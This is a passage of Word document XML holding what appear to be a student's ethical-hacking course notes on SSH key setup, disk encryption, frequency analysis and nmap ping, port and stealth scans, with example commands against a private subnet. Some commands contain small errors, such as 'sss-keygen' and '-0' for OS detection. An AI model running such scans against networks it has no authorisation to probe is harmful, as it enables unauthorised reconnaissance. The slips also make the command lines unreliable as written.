      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00302608" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sss-keygen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –t RSA</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>-- generate a key pair for you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> id_rs</w:t>
      </w:r>
      <w:r w:rsidR="00302608" w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>a.pub kilroy@192.168.1.39:.ssh</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- secure copy the key to the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> id_rsa.pub &gt;&gt; authorized_keys2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- appends the key to the authorized keys file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00302608" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> kilroy@192.168.1.39</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>-- no longer requires password to authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- change </w:t>
      </w:r>
      <w:r w:rsidR="006D23FF">
        <w:t xml:space="preserve">to hidden </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contents of </w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve">the current </w:t>
      </w:r>
      <w:r>
        <w:t>directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00302608" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>known</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> hosts</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:tab/>
        <w:t>-- this is the key storage for all of the other systems you have connected to from this system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- holds </w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>Instead</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of using IP you can name the system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Early version of SSH were vulnerable. V1 has been broken. </w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>They were v</w:t>
      </w:r>
      <w:r>
        <w:t>ulnerable to being read in clear text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00302608">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- read the manual for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00302608" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>putty.exe</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>in Windows is a GUI for SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Disk Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Now PCs are faster full Disk Encryption is a viable option. Lots of ways of doing it on different systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Microsoft have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5131">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>BitLocker</w:t>
      </w:r>
      <w:r w:rsidR="00CD5131">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00CD5131" w:rsidRPr="00CD5131">
        <w:t>which is an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AES cipher. Uses a feature called Trusted</w:t>
      </w:r>
      <w:r w:rsidR="00CD5131">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Platform</w:t>
      </w:r>
      <w:r w:rsidR="00CD5131">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Module</w:t>
      </w:r>
      <w:r w:rsidR="00CD5131">
        <w:t>, TPM, which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a chip that stores the keys that allow the OS to </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apple MACOS uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5131">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FileVault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux Ubuntu Version uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5131">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gdecrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - a GUI for mapping/mounting and creating encrypted volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Disk encryption is a good idea as a </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>pen tester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as you will probably be holding customer data which is then considered "At Risk" if you lose your laptop etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Cryptographic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Frequency analysis. What letters appear most commonly in the cipher </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>text?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> E is most common letter followed by TAOIN. Guess these first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Will take some effort and a lot of guessing. Old fashioned technique that won't work as well on modern encryption standards.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Different Types of Scans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scanning is often one of the first steps of an ethical hack. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve">Nmap is the most favoured tool. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ping Scan</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>- utility that sends out 'echo requests' to every host address on a network to determine which addresses are 'up'. Sometimes systems are configured to not reply to pings</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00ED7F2D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.0/24</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t>This will send a PING to every address in the subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Port scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - scans for open ports. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Scans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> about a 1000 open ports. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- Send a TCP SYN packet to every address on the network. It will send a ping first </w:t>
      </w:r>
      <w:r w:rsidRPr="000748A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D" w:rsidRPr="000748A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> there is</w:t>
      </w:r>
      <w:r w:rsidRPr="000748A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> no reply then </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D" w:rsidRPr="000748A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">it won’t send the </w:t>
      </w:r>
      <w:r w:rsidRPr="000748A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TCP SYN</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00ED7F2D" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> TCP Connect scan is different to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> TCP SYN attack as it completes the 3-way handshake between the attacker and the host </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">obviously </w:t>
      </w:r>
      <w:r>
        <w:t>generates</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> a log message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> - looks for </w:t>
      </w:r>
      <w:r>
        <w:t>specific</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> vulnerabilities on a target system. </w:t>
      </w:r>
      <w:r>
        <w:t>Checks</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> for open ports and application versions, then compare to vulnerability table to see if it can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Not all application will respond with what version it is running. "Banner grabbing". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>mapping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve"> Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a port scanner. It goes off and scans the target for open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is a GUI but always best to learn the proper Terminal. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will try and work out the target OS or Application Version from the responses it gets. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- brings up the nmap manual to have a read.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="006D23FF" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –p-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>-- this will scan ALL ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -0 -v 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- simple SYN stealth scan to try and guess the OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Other types of nmap scan</w:t>
      </w:r>
    </w:p>
